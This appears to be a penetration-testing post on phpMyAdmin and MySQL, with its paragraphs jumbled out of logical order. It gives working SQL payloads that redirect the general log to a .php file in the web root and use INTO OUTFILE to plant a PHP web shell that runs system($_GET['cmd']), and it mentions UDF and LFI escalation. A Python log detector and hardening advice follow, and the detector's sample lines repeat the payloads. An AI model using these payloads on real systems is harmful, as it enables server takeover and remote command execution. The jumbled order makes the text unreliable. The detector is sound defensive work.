HackTricks: phpMyAdmin
    SET GLOBAL general_log = 'ON';
    SET GLOBAL general_log_file = '/var/www/html/hack.php';
    SELECT '<?php phpinfo(); ?>';

Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective.

You have root MySQL access, but you are a low-privilege OS user. How do we escalate?
For a sysadmin, it’s a tool. For a pentester, it is often the endgame.
This post is for educational purposes and authorized security testing only.
We compile a MySQL extension (UDF) that runs OS commands.
    SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Boom. You now have a web shell.
If you have FILE privileges or root access to MySQL, you can force the server to write PHP code into its own error log, then include that log via a Local File Inclusion (LFI).
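For the defending side, the log-redirection and INTO OUTFILE statements shown on this page leave a recognisable trace in any statement record (general log, audit plugin, or proxy capture). The following detector is an added example, not code from the original post; the input format (one statement per line), the extension list, the web-root list and the sample lines are assumptions constructed for illustration.

```python
import re

# Extensions a web server may execute and common document roots.
# Both lists are assumptions for this example; tune them to your stack.
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar|jsp|aspx?)$", re.I)
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/")

RULES = [
    # Server log file pointed somewhere other than a log directory.
    ("log_file_redirect", re.compile(
        r"\bset\s+(?:global\s+|@@global\.)(?:general_log_file|slow_query_log_file)"
        r"\s*=\s*(['\"])(?P<path>.+?)\1", re.I)),
    # Query result written straight to disk.
    ("into_outfile", re.compile(
        r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(?P<path>.+?)\1", re.I)),
]
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)  # script open tag inside SQL text


def risky_path(path):
    """True if the target is script-executable or sits under a web root."""
    return bool(SCRIPT_EXT.search(path)) or path.lower().startswith(WEB_ROOTS)


def scan(lines):
    """Return (line_no, rule, path) for each statement that deserves triage."""
    hits = []
    for no, line in enumerate(lines, 1):
        for name, rx in RULES:
            m = rx.search(line)
            if m and risky_path(m.group("path")):
                hits.append((no, name, m.group("path")))
        if PHP_TAG.search(line):
            hits.append((no, "php_tag_in_query", ""))
    return hits


# Constructed sample: statements from this page mixed with benign ones.
SAMPLE = '''\
2024-05-01T10:00:01Z 12 Query SET GLOBAL general_log = 'ON'
2024-05-01T10:00:02Z 12 Query SET GLOBAL general_log_file = '/var/www/html/hack.php'
2024-05-01T10:00:03Z 12 Query SELECT '<?php phpinfo(); ?>'
2024-05-01T10:00:04Z 12 Query SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"
2024-05-01T10:05:00Z 31 Query SET GLOBAL general_log_file = '/var/log/mysql/general.log'
2024-05-01T10:06:00Z 31 Query SELECT id FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'
'''.splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

On the prevention side, `INTO OUTFILE` needs the `FILE` privilege and is confined by `secure_file_priv`, and the MySQL OS account should have no write access to the web root, which blocks both file-write paths regardless of database privileges.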